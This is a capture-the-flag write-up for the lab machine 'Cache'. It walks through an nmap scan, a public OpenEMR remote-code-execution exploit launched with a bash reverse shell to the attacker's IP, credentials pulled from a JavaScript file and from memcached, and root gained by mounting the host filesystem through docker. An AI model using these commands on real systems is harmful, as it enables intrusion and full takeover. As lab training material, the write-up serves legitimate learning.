Cache is Linux box which having IP address 10.10.10.188, Let’s start with nmap scan and some enumeration part.

#nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|http-favicon: Unknown favicon MD5: 6CE8D3334381134EB0A89D8FECE6EEB2 | http-methods: | Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Visit web service on port 80, and got js file which contain username and password.

Visit web service on port 80, and got js file which contain username and password. After login we got nothing, after some time got hint with hms so added hms.htb to hosts file. And what we got Openemr over there.

Exploit: https://www.exploit-db.com/exploits/45161

$python openemr_rce.py http://hms.htb-u openemr_admin -p xxxxxx-c 'bash -i >& /dev/tcp/10.10.15.185/1337 0>&1'

Listen with nc and we are into system. 🙂

#user flag

Use python tty python3 -c ‘import pty; pty.spawn(“/bin/sh”)’

$ nc -lvp 1337
listening on [any] 1337 …
connect to [10.10.15.185] from hms.htb [10.10.10.188] 41960
bash: cannot set terminal process group (2086): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/var/www/hms.htb/public_html/interface/main$

Found two users one of the user named ash which got credentials in js file and got user.txt

$ cd /home
$ ls
ash luffy
$ su ash
Password: [email protected]_fun
[email protected]:/home$ ls
ash luffy
[email protected]:/home$ cd ash
[email protected]:~$ ls
Desktop Documents Downloads Music Pictures Public user.txt
[email protected]:~$ cat user.txt
ba3ad6c2fb35d648301680f2b2b8dc34

After some time got telnet which running on port 11211

[email protected]:~$ ss -tnl
ss -tnl
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 127.0.0.1:11211 0.0.0.0:*
LISTEN 0 128 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*

First connect via telnet and get passwd , got luffy : 0n3_p1ec3

[email protected]:~$ telnet localhost 11211
telnet localhost 11211
Trying ::1…
Trying 127.0.0.1…
Connected to localhost.
Escape character is '^]'.
get passwd
VALUE passwd 0 9
0n3_p1ec3
END

#root flag

After login into luffy account, got prev esc. docker run -v /:/mnt –rm -it ubuntu chroot /mnt sh

[email protected]:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
#id
uid=0(root) gid=0(root) groups=0(root)
#ls
bin home lib64 opt sbin sys vmlinuz
boot initrd.img lost+found proc snap tmp vmlinuz.old
dev initrd.img.old media root srv usr
etc lib mnt run swap.img var
#cd root
#ls
root.txt
#cat root.txt
13075205f94778ab0de9e50946e11c7e

LEAVE A REPLY

Please enter your comment!
Please enter your name here